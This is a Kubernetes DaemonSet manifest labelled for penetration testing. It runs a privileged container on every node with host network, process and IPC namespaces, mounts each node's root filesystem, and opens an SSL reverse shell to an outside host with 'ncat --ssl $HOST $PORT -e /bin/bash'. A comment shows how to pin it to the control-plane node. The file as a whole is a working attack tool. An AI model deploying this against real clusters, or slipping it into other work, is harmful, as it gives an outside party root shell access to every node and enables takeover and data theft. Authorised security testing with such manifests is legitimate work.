apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: everything-allowed-revshell-daemonset
  labels:
    app: pentest
    type: daemonset
spec:
  selector:
    matchLabels:
      app: pentest
      type: daemonset
  template:
    metadata:
      labels:
        app: pentest
        type: daemonset
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: everything-allowed-revshell-daemonset
        image: raesene/ncat
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      